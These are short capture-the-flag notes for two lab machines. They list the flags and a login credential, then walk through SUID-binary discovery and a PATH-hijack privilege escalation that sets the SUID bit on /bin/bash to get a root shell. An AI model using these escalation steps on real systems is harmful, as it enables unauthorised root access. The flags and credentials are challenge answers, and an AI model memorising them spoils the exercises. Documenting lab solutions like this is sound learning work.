Chambers Of Secrets :-


Ch4mb3r0fS3cr3ts{Al4rt3_A5c3nd@r3}
Ch4mb3r0fS3cr3ts{D3v1Ls_5n4R3}
Ch4mb3r0fS3cr3ts{1_4m_L0rd_V0ld3m0rt}

----------------------------------------------------------------------------------------------------------------------------------------------
Pallet-City:-


pallet-city{g0TT@_c@Tch_3m_@Ll}
pallet_city{YouMightBeAshNowButAreYouWorthyEnoughOfMewtwo?}
pallet_city{MeetMewTwoatCeruleanCave}

Pallet_city creds:-

ashketchum:g0L150p0D

Tried ```sudo -l``` but there was no success.
So,I used find command as under:-

find / -perm -u=s -type f 2>/dev/null 

and I got one binary file in the /var/log path.
Path Hijacking vuln :-

Make a new file called cat in the tmp file with this contents as follows:-
chmod +s /bin/bash

And make it executable file.

To hijack the path variable we need to export the tmp directory path as ```export PATH=/tmp:$PATH```. After doing that navigate to /var/log and just execute the binary thereafter and after running the binary type this command ```/bin/bash -p```  to get the root user.
----------------------------------------------------------------------------------------------------------------------------------------------

Common things to note in both the machines is ftp server has a anonymous login and also in the file system we have the directory which starts from three dots that's quite rare in the actual file system. 